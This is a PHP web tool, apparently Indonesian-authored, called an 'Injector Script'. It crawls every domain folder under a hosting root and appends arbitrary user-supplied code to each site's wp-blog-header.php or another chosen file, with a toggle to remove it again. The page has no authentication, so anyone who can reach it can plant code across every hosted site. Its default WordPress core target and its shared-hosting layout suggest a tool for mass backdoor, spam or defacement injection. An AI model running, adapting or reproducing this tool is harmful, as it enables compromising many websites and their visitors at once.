<?php
// injector_live_toggle.php
// Versi: AJAX streaming + Tailwind + Inject / Uninject toggle + backup + auto add tag if missing
// NOTE: gunakan dengan hati-hati. Pastikan permission file/folder sesuai.

// --- CONFIG ---
$allowedTLD = [
    'com','net','org','info','biz','xyz','site','online','tech','store','app','dev','io','me','co','top','pro','club','agency','design','life','world','space','news','shop','live','digital','tv','studio','cloud','team','solutions','social','global','media','network','education','health','travel','finance','marketing','photography','art','fashion','music','video','films','movie','games','game','blog','academy','school','college','university',
    'us','uk','id','au','ca','de','fr','jp','cn','ru','in','br','mx','es','it','nl','se','ch','no','fi','be','dk','pl','cz','tr','za','kr','sg','hk','ae','my','th','vn','ph','pk','ng','eg','ar','cl','co','pe','uy','ve','is','ie','lt','lv','ee','gr','pt','ro','bg','hu','si','sk','hr','ba','rs','md','am','ge','az','kz','ua','by','tj','uz','kg','mn','la','kh','mm','np','lk','bd','bt','mv','qa','kw','om','bh','sa','jo','lb','sy','iq','ir','af','ye','tn','dz','ma','ly','sd','ke','tz','ug','gh','sn','cm','ci','ml','bf','ne','tg','mg','zm','zw','mu','re','sc'
];

$defaultRoot = dirname(__FILE__);

// helper untuk escape di UI (server-side echo fallback)
function esc($s){ return htmlspecialchars((string)$s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); }

// helper: kirim NDJSON line
function send_msg($type, $text) {
    $obj = ['type'=>$type, 'msg'=>$text];
    echo json_encode($obj, JSON_UNESCAPED_UNICODE) . "\n";
    @ob_flush();
    @flush();
}

// STREAMING endpoint
if ($_SERVER['REQUEST_METHOD'] === 'POST' && (isset($_POST['stream']) && $_POST['stream'] === '1')) {
    ignore_user_abort(true);
    set_time_limit(0);
    header('Content-Type: application/x-ndjson; charset=utf-8');
    header('Cache-Control: no-cache');
    if (function_exists('apache_setenv')) @apache_setenv('no-gzip', '1');
    @ini_set('zlib.output_compression', '0');
    @ini_set('implicit_flush', '1');
    while (ob_get_level()) ob_end_flush();
    ob_implicit_flush(true);

    $root = rtrim($_POST['webroot'] ?? $defaultRoot, "/\\");
    $scriptToInject = $_POST['script'] ?? '';
    $usePublicHtml = isset($_POST['use_public_html']) && $_POST['use_public_html'] === '1';
    $action = in_array($_POST['action'] ?? 'inject', ['inject','uninject']) ? $_POST['action'] : 'inject';

    // tambahan: nama file target (jika kosong pakai wp-blog-header.php)
    $targetFilename = trim($_POST['target_filename'] ?? '');
    if ($targetFilename === '') {
        $targetFilename = 'wp-blog-header.php';
    } else {
        // sanitasi nama file sederhana: jangan izinkan path traversal
        $targetFilename = basename($targetFilename);
    }

    send_msg('info', "Starting — root: {$root} — action: {$action} — public_html toggle: " . ($usePublicHtml ? 'ON' : 'OFF') . " — target file: {$targetFilename}");

    if (!is_dir($root)) {
        send_msg('error', "Webroot tidak ditemukan: {$root}");
        send_msg('done', "finished");
        exit;
    }

    $domains = array_filter(glob($root . '/*', GLOB_ONLYDIR), 'is_dir');
    if (empty($domains)) {
        send_msg('info', "Tidak ada folder domain ditemukan di: {$root}");
        send_msg('done', "finished");
        exit;
    }

    foreach ($domains as $domainPath) {
        $folderName = basename($domainPath);
        $parts = explode('.', $folderName);
        $tld = strtolower(end($parts));

        if (!in_array($tld, $GLOBALS['allowedTLD'])) {
            send_msg('warn', "TLD {$tld} tidak termasuk — skip {$folderName}");
            continue;
        }

        $targetPath = $domainPath;
        if ($usePublicHtml) {
            $maybe = $domainPath . '/public_html';
            if (is_dir($maybe)) {
                $targetPath = $maybe;
                send_msg('info', "Menggunakan {$folderName}/public_html sebagai target");
            } else {
                send_msg('warn', "{$folderName} toggle public_html diaktifkan tapi folder public_html tidak ditemukan — memakai root domain");
            }
        }

        send_msg('progress', "Proses: {$folderName} (target: {$targetPath})");

        // gunakan nama file target yang diberikan
        $indexFile = $targetPath . '/' . $targetFilename;
        $indexHtml = $targetPath . '/index.html';

        // Jika action = inject dan file target tidak ada tapi index.html ada -> rename index.html jadi targetFilename
        if ($action === 'inject') {
            if (!file_exists($indexFile) && file_exists($indexHtml)) {
                // hanya coba rename jika target filename terlihat sebagai file (basename) dan bukan traversal
                if (@rename($indexHtml, $indexFile)) {
                    send_msg('info', "index.html di-rename jadi {$targetFilename} di {$targetPath}");
                } else {
                    send_msg('error', "Gagal merename index.html jadi {$targetFilename} di {$targetPath} (cek permission)");
                }
            }
        }

        if (!file_exists($indexFile)) {
            send_msg('error', "{$targetFilename} tidak ditemukan di {$targetPath}");
            continue;
        }

        // baca isi file
        $content = @file_get_contents($indexFile);
        if ($content === false) {
            send_msg('error', "Gagal membaca {$indexFile} (cek permission)");
            continue;
        }

        // buat backup sebelum perubahan (timestamp)
        $bakName = $indexFile . '.bak_' . time();
        if (!@copy($indexFile, $bakName)) {
            send_msg('warn', "Gagal membuat backup untuk {$indexFile} — lanjut tanpa backup (cek permission)");
        } else {
            send_msg('info', "Backup dibuat: {$bakName}");
        }

        // ===== LOGIKA TAMBAHAN: tambahkan tag di akhir kalau tidak ada =====
        if ($action === 'inject') {
            $content = rtrim($content);
            if (substr($content, -2) !== '?>') {
                $content .= "\n?>";
                send_msg('info', "Tag penutup PHP '?>' otomatis ditambahkan di {$indexFile}");
            }
        }

        if ($action === 'inject') {
            if ($scriptToInject === '') {
                send_msg('warn', "Script kosong — skip inject di {$indexFile}");
                continue;
            }

            if (strpos($content, $scriptToInject) === false) {
                if (@file_put_contents($indexFile, $content . "\n" . $scriptToInject) !== false) {
                    send_msg('success', "Script berhasil di-inject ke {$indexFile}");
                } else {
                    send_msg('error', "Gagal menulis ke {$indexFile} (cek permission)");
                }
            } else {
                send_msg('info', "Script sudah ada di {$indexFile} — skip");
            }
        } else { // uninject
            if ($scriptToInject === '') {
                send_msg('warn', "Script kosong — tidak ada yang di-uninject di {$indexFile}");
                continue;
            }

            $new = str_replace($scriptToInject, '', $content);

            if ($new === $content) {
                $quoted = preg_quote($scriptToInject, '/');
                $pattern = '/(?:\r?\n){0,2}' . $quoted . '(?:\r?\n){0,2}/u';
                $new = preg_replace($pattern, '', $content);
            }

            if ($new === $content) {
                $lines = preg_split('/\r\n|\n|\r/', $content);
                $scriptLines = preg_split('/\r\n|\n|\r/', $scriptToInject);
                $scriptLinesTrimmed = array_map('trim', $scriptLines);

                $outLines = [];
                $i = 0;
                $removedCount = 0;
                $totalLines = count($lines);
                while ($i < $totalLines) {
                    $matched = true;
                    for ($j = 0; $j < count($scriptLinesTrimmed); $j++) {
                        if (!isset($lines[$i+$j]) || trim($lines[$i+$j]) !== $scriptLinesTrimmed[$j]) {
                            $matched = false;
                            break;
                        }
                    }
                    if ($matched && count($scriptLinesTrimmed) > 0) {
                        $i += count($scriptLinesTrimmed);
                        $removedCount++;
                        continue;
                    } else {
                        $outLines[] = $lines[$i];
                        $i++;
                    }
                }
                if ($removedCount > 0) {
                    $new = implode("\n", $outLines);
                }
            }

            if ($new === $content) {
                send_msg('info', "Script tidak ditemukan di {$indexFile} — tidak ada perubahan.");
            } else {
                if (@file_put_contents($indexFile, $new) !== false) {
                    send_msg('success', "Script berhasil dihapus (uninject) dari {$indexFile}");
                } else {
                    send_msg('error', "Gagal menulis ke {$indexFile} setelah uninject (cek permission)");
                }
            }
        }

        usleep(100000); // 0.1s
    }

    send_msg('done', "Selesai memproses semua domain.");
    exit;
}

// Jika bukan streaming POST -> tampilkan UI
?>
<!DOCTYPE html>
<html lang="id">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width,initial-scale=1" />
<title>Injector Script — Live Toggle Inject / Uninject</title>
<script src="https://cdn.tailwindcss.com"></script>
</head>
<body class="bg-gray-900 text-gray-100 min-h-screen flex items-center justify-center p-6">
  <div class="w-full max-w-4xl bg-gray-800 rounded-2xl shadow-lg p-6">
    <h1 class="text-2xl font-bold mb-4 text-center">Injector Script — Live (Inject / Uninject)</h1>

    <form id="injectForm" class="space-y-4">
      <div>
        <label class="block mb-1">Webroot Folder</label>
        <input type="text" name="webroot" id="webroot" value="<?php echo esc($_POST['webroot'] ?? $defaultRoot); ?>" class="w-full p-2 rounded bg-gray-700 text-gray-100 focus:outline-none focus:ring-2 focus:ring-blue-500">
        <p class="text-sm text-gray-400 mt-1">Contoh: /home (script akan memeriksa /home/*). Centang opsi public_html jika struktur hosting berada di /home/user/domain.com/public_html.</p>
      </div>

      <div class="flex items-center gap-2">
        <input id="use_public_html" name="use_public_html" type="checkbox" value="1" class="w-4 h-4">
        <label for="use_public_html" class="text-sm">Gunakan folder <code>/public_html</code> dalam tiap domain (jika ada)</label>
      </div>

      <div>
        <label class="block mb-1">Action</label>
        <div class="flex gap-4">
          <label class="inline-flex items-center"><input type="radio" name="action" value="inject" checked class="form-radio"> <span class="ml-2">Inject (tambahkan script)</span></label>
          <label class="inline-flex items-center"><input type="radio" name="action" value="uninject" class="form-radio"> <span class="ml-2">Uninject (hapus script yang sama)</span></label>
        </div>
        <p class="text-sm text-gray-400 mt-1">Pilih <strong>Uninject</strong> untuk menghapus hanya blok script yang Anda masukkan — file tidak akan dihapus.</p>
      </div>

      <div>
        <label class="block mb-1">Nama file target (mis. <code>index.php</code> atau <code>wp-blog-header.php</code>)</label>
        <input type="text" name="target_filename" id="target_filename" value="<?php echo esc($_POST['target_filename'] ?? 'wp-blog-header.php'); ?>" class="w-full p-2 rounded bg-gray-700 text-gray-100 focus:outline-none focus:ring-2 focus:ring-blue-500" placeholder="wp-blog-header.php">
        <p class="text-sm text-gray-400 mt-1">Kosongkan untuk memakai default <code>wp-blog-header.php</code>. Nama file akan digunakan pada tiap domain (basename saja, tanpa path).</p>
      </div>

      <div>
        <label class="block mb-1">Script yang akan di-inject / di-uninject</label>
        <textarea name="script" id="script" rows="8" class="w-full p-2 rounded bg-gray-700 text-gray-100 focus:outline-none focus:ring-2 focus:ring-blue-500" placeholder="// masukkan kode php atau html yang ingin di-inject atau dihapus"><?php echo esc($_POST['script'] ?? ''); ?></textarea>
      </div>

      <div class="flex gap-2">
        <button id="submitBtn" type="submit" class="flex-1 bg-blue-600 hover:bg-blue-700 text-white font-bold py-2 px-4 rounded">Start (Live)</button>
        <button id="stopBtn" type="button" class="bg-red-600 hover:bg-red-700 text-white font-bold py-2 px-4 rounded">Stop</button>
      </div>
    </form>

    <div class="mt-6">
      <div id="statusBar" class="mb-2 text-sm text-gray-300">Status: idle</div>
      <div id="result" class="bg-gray-700 p-4 rounded overflow-auto max-h-96 text-sm space-y-1">
        <!-- messages appear here -->
      </div>
    </div>
  </div>

<script>
(function(){
  const form = document.getElementById('injectForm');
  const result = document.getElementById('result');
  const statusBar = document.getElementById('statusBar');
  const submitBtn = document.getElementById('submitBtn');
  const stopBtn = document.getElementById('stopBtn');
  let controller = null; // for aborting fetch

  function appendMsg(type, msg) {
    const div = document.createElement('div');
    div.className = 'px-2 py-1 rounded';
    let bg = 'bg-gray-800 text-gray-300';
    if (type === 'error') bg = 'bg-red-700 text-white';
    if (type === 'warn') bg = 'bg-yellow-600 text-black';
    if (type === 'success') bg = 'bg-green-700 text-white';
    if (type === 'info') bg = 'bg-blue-700 text-white';
    if (type === 'progress') bg = 'bg-indigo-700 text-white';
    if (type === 'done') bg = 'bg-gray-600 text-white';
    div.classList.add(...bg.split(' '));
    div.innerHTML = `<strong>[${type}]</strong> ${escapeHtml(msg)}`;
    result.appendChild(div);
    result.scrollTop = result.scrollHeight;
  }

  function escapeHtml(s) {
    return (s+'').replace(/&/g,'&amp;').replace(/</g,'&lt;').replace(/>/g,'&gt;');
  }

  form.addEventListener('submit', async function(e){
    e.preventDefault();
    result.innerHTML = '';
    statusBar.textContent = 'Status: connecting...';
    submitBtn.disabled = true;

    const fd = new FormData(form);
    fd.append('stream', '1'); // request streaming mode

    controller = new AbortController();
    const signal = controller.signal;

    try {
      const resp = await fetch(location.href, {
        method: 'POST',
        body: fd,
        signal: signal,
        credentials: 'same-origin',
      });

      if (!resp.ok) {
        appendMsg('error', 'Server error: ' + resp.status + ' ' + resp.statusText);
        statusBar.textContent = 'Status: error';
        submitBtn.disabled = false;
        return;
      }

      statusBar.textContent = 'Status: streaming...';
      const reader = resp.body.getReader();
      const decoder = new TextDecoder('utf-8');
      let buffer = '';

      while (true) {
        const { value, done } = await reader.read();
        if (done) break;
        buffer += decoder.decode(value, { stream: true });

        // split by newline - NDJSON
        let lines = buffer.split('\n');
        buffer = lines.pop();

        for (let line of lines) {
          line = line.trim();
          if (!line) continue;
          try {
            const obj = JSON.parse(line);
            appendMsg(obj.type || 'info', obj.msg || '');
            if (obj.type === 'done') {
              statusBar.textContent = 'Status: finished';
              submitBtn.disabled = false;
            }
          } catch (err) {
            appendMsg('error', 'Parsing error: ' + err.message + ' — raw: ' + line);
          }
        }
      }

      if (buffer.trim()) {
        try {
          const obj = JSON.parse(buffer.trim());
          appendMsg(obj.type || 'info', obj.msg || '');
        } catch (err) {
          appendMsg('error', 'Parsing error at end: ' + err.message);
        }
      }

      statusBar.textContent = 'Status: stream closed';
      submitBtn.disabled = false;
    } catch (err) {
      if (err.name === 'AbortError') {
        appendMsg('warn', 'User aborted the request.');
        statusBar.textContent = 'Status: aborted';
      } else {
        appendMsg('error', 'Fetch error: ' + (err.message || err));
        statusBar.textContent = 'Status: error';
      }
      submitBtn.disabled = false;
    }
  });

  stopBtn.addEventListener('click', function(){
    if (controller) {
      controller.abort();
      controller = null;
    }
  });

})();
</script>
</body>
</html>